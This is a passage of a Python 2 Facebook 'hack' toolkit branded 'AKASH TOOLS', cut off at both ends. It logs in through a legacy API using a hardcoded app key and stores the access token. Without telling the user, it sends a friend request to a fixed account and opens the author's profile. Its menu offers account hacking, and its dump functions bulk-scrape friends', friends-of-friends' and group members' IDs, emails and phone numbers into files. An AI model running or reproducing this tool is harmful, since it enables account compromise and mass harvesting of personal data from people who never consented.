sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
🔷💓💓🔷
_____ _ ____ _ ____ ____
/__ __\/ \ /|/ _ \/ \ /|/ _ \/ _ \
/ \ | |_||| / \|| |\ ||| | \|| / \|
| | | | ||| |-||| | \||| |_/|| |-||
\_/ \_/ \|\_/ \|\_/ \|\____/\_/ \|
____ ____
| _ \ /\ | _ \ /\
| |_) | / \ | |_) | / \
| _ < / /\ \ | _ < / /\ \
| |_) / ____ \| |_) / ____ \
|____/_/ \_\____/_/ \_\
""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Login"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Login using token"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Exit"
print "\033[1;97m║"
msuk = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;91m[☆] \033[1;92mLOGIN WITH FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;91m[+] \033[1;36mPassword \033[1;91m:\033[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
os.system('xdg-open https://www.facebook.com/Thanda.babaa')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
os.system('xdg-open https://www.facebook.com/Thanda.babaa')
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
#### MENU ####
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "\033[1;92m 🔷AKASH TOOLS🔷"
print
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m User information"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Get Id/email/hp"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Hack facebook account "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Bot "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Others "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m6.\033[1;97m Show token "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m7.\033[1;97m Update "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m8.\033[1;97m Delete trash "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m9.\033[1;97m LogOut "
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.system('reset')
print logo
print 40 * '\033[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\033[1;91m[ \033[1;97mBack \033[1;91m]')
menu()
elif zedd =="8":
os.remove('out')
elif zedd =="9":
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/Thanda.babaa')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[AKASH] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[AKASH] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[AKASH] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[AKASH] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Get group member ID"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Get group member email"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Get group member phone number"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m6.\033[1;97m Get email friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m8.\033[1;97m Get a friend's phone number"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
id_member_grup()
elif cuih =="4":
em_member_grup()
elif cuih =="5":
no_member_grup()
elif cuih =="6":
email()
elif cuih =="7":
emailfrom_teman()
elif cuih =="8":
nomor_hp()
elif cuih =="9":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(50000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NUMBER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
